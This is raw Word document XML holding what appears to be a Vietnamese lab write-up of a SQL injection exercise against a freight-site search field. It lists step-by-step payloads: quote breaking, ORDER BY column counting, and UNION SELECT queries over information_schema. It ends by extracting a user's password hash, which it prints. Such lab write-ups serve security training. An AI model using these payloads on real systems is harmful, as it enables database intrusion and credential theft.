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CDFCA" w14:textId="5492372F" w:rsidR="00736974" w:rsidRPr="00736974" w:rsidRDefault="00736974" w:rsidP="00736974">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00736974">
        <w:t>What is the password hash for '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00736974">
        <w:t>newuser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00736974">
        <w:t>' stored in the 'users' table in the 'ilfreight' database?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CBC5C3" w14:textId="28BDC92E" w:rsidR="00CC0604" w:rsidRDefault="00CC0604" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13DBB7A4" wp14:editId="4C5FE6E9">
            <wp:extent cx="5943600" cy="2996565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1868388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886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F87C" w14:textId="680CEB80" w:rsidR="00CC0604" w:rsidRDefault="00CC0604" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Trang web tìm kiếm dựa trên cột Port Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FFC3C4" w14:textId="6E84E953" w:rsidR="00604348" w:rsidRDefault="00604348" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">dụng </w:t>
      </w:r>
      <w:r w:rsidR="0086219C">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ta phát hiện được bất thường và phiên bản server là MariaDB viết theo MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C1BC9" w14:textId="0656BD0F" w:rsidR="0086219C" w:rsidRDefault="0086219C" w:rsidP="0086219C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C5A6E5" w14:textId="2309EFD4" w:rsidR="0086219C" w:rsidRDefault="0086219C" w:rsidP="0086219C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>CN SHA’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB8828A" w14:textId="2FDB1CF4" w:rsidR="0086219C" w:rsidRDefault="0086219C" w:rsidP="0086219C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591CC39" w14:textId="461E0607" w:rsidR="00604348" w:rsidRDefault="00604348" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DA2193" wp14:editId="651D1536">
            <wp:extent cx="5943600" cy="1972310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1533967181" name="Picture 1" descr="A blu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67181" name="Picture 1" descr="A blue box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D00F" w14:textId="57730780" w:rsidR="00F80B05" w:rsidRDefault="00F80B05" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Biến bất thường thành bình thường bằng cách thêm ký tự comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C4B94" w14:textId="71B0AEDD" w:rsidR="00F80B05" w:rsidRDefault="00F80B05" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF99F3" w14:textId="2A4BAEDC" w:rsidR="00F80B05" w:rsidRDefault="00F80B05" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F80B05">
        <w:t>CN SHA'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E10DB" w14:textId="1078632F" w:rsidR="00F80B05" w:rsidRDefault="00F80B05" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653F7AD" w14:textId="1C56914E" w:rsidR="00F80B05" w:rsidRDefault="00F80B05" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40111CA7" wp14:editId="4859B49F">
            <wp:extent cx="5943600" cy="1635760"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1969942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429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ACCA" w14:textId="77777777" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF51278" w14:textId="42851819" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Xác định số cột của bảng port bằng câu lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49309FBD" w14:textId="71125F63" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C199419" w14:textId="338C1501" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>CN SHA’ order by $-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1155E" w14:textId="3E8CF5E4" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3B2A0" w14:textId="7E45C995" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56534626" wp14:editId="51785FF7">
            <wp:extent cx="5943600" cy="1644015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182381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121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786B" w14:textId="43828E1C" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0292A23D" wp14:editId="2A2D15DA">
            <wp:extent cx="5943600" cy="1649095"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="133097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74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486F" w14:textId="2ACD17A3" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vậy bảng port có 4 cột </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC72F47" w14:textId="254A6DEB" w:rsidR="00D04371" w:rsidRDefault="00D04371" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử dụng UNION SELECT để trích xuất thông tin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59842C" w14:textId="263C10AC" w:rsidR="000B087E" w:rsidRDefault="000B087E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trích xuất CSDL đang </w:t>
      </w:r>
      <w:r w:rsidR="00541846">
        <w:t>có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27817341" w14:textId="6B40331B" w:rsidR="00D04371" w:rsidRDefault="000B087E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D864953" w14:textId="14E40939" w:rsidR="000B087E" w:rsidRDefault="000B087E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="000B087E">
        <w:t xml:space="preserve">CNSHA' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B087E">
        <w:t>NULL,GROUP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B087E">
        <w:t>_CONCAT(0x7c,schema_name,0x7c),NULL,NULL FROM information_schema.schemata-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BAF33B" w14:textId="144CAE8C" w:rsidR="000B087E" w:rsidRDefault="000B087E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8D3B4" w14:textId="75F0F0F2" w:rsidR="00541846" w:rsidRDefault="00541846" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37587AF0" wp14:editId="098E2532">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="706972037" name="Picture 1" descr="A blue and white box with a white box and a white box with a white box with a white box with a white box with a white box with a black box with a white box with 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72037" name="Picture 1" descr="A blue and white box with a white box and a white box with a white box with a white box with a white box with a white box with a black box with a white box with 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AE2F" w14:textId="3F2D46BA" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm các bảng trong </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CSDL  Ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> thấy trong CSDL ilfreight có bảng users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB4460" w14:textId="0B6B5CE7" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0B108" w14:textId="6854F69C" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00841A73">
        <w:t xml:space="preserve">CNSHA' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00841A73">
        <w:t>NULL,GROUP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00841A73">
        <w:t>_CONCAT(0x7c,table_name,0x7C),NULL,NULL FROM information_schema.tables WHERE table_schema='ilfreight'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777BCE9" w14:textId="455FE89B" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A45C98B" w14:textId="62B4AE57" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48913C96" wp14:editId="27D8B1E4">
            <wp:extent cx="5943600" cy="1640205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181502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20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2719" w14:textId="5CF97BE2" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Xác định số cột trong bảng users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A60874" w14:textId="6067925F" w:rsidR="000B087E" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589BF721" w14:textId="7A7631FD" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00841A73">
        <w:t xml:space="preserve">CNSHA' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00841A73">
        <w:t>NULL,GROUP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00841A73">
        <w:t>_CONCAT(0x7c,column_name,0x7C),NULL,NULL FROM information_schema.columns WHERE table_name='users'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E6615" w14:textId="4E424BED" w:rsidR="00841A73" w:rsidRDefault="00841A73" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F23B78" w14:textId="23369856" w:rsidR="00841A73" w:rsidRDefault="009D1080" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="007ED311" wp14:editId="53198AC7">
            <wp:extent cx="5943600" cy="2122805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92308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81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9A7F" w14:textId="302F3514" w:rsidR="0045407E" w:rsidRDefault="0045407E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2F53F" w14:textId="0EA8DF7F" w:rsidR="0045407E" w:rsidRDefault="0045407E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0045407E">
        <w:t xml:space="preserve">CNSHA' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045407E">
        <w:t>NULL,password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045407E">
        <w:t>,NULL,NULL FROM users where username='</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045407E">
        <w:t>newuser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045407E">
        <w:t>'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEE568" w14:textId="46191173" w:rsidR="0045407E" w:rsidRDefault="0045407E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7921F265" w14:textId="1F51D26A" w:rsidR="0037460E" w:rsidRDefault="0037460E" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2101F4AA" wp14:editId="5A797467">
            <wp:extent cx="5943600" cy="1653540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1018493459" name="Picture 1" descr="A blue and white box with a white box and a black box with a white box with a white box with a black box with a white box with a black box with a white box with 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93459" name="Picture 1" descr="A blue and white box with a white box and a black box with a white box with a white box with a black box with a white box with a black box with a white box with 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F21C" w14:textId="2E7033F4" w:rsidR="00736974" w:rsidRDefault="00736974" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00736974">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00736974">
        <w:t>9da2c9bcdf39d8610954e0e11ea8f45f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28188E97" w14:textId="77777777" w:rsidR="00F80B05" w:rsidRDefault="00F80B05" w:rsidP="00CC0604">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F8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C3C47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E996C982"/>
    <w:lvl w:ilvl="0" w:tplc="D2908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0B30B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2AA0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085573">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="13240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9C"/>
    <w:rsid w:val="000B087E"/>
    <w:rsid w:val="002C0821"/>
    <w:rsid w:val="0037460E"/>
    <w:rsid w:val="0045407E"/>
    <w:rsid w:val="00541846"/>
    <w:rsid w:val="00604348"/>
    <w:rsid w:val="00736974"/>
    <w:rsid w:val="00841A73"/>
    <w:rsid w:val="0086219C"/>
    <w:rsid w:val="009D1080"/>
    <w:rsid w:val="00AA1F43"/>
    <w:rsid w:val="00CC0604"/>
    <w:rsid w:val="00D04371"/>
    <w:rsid w:val="00D5169C"/>
    <w:rsid w:val="00D6474A"/>
    <w:rsid w:val="00F8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F846"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8259D0BB-8A80-4E70-BF86-EEC2B5DB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6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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-26T07:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-26T07:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>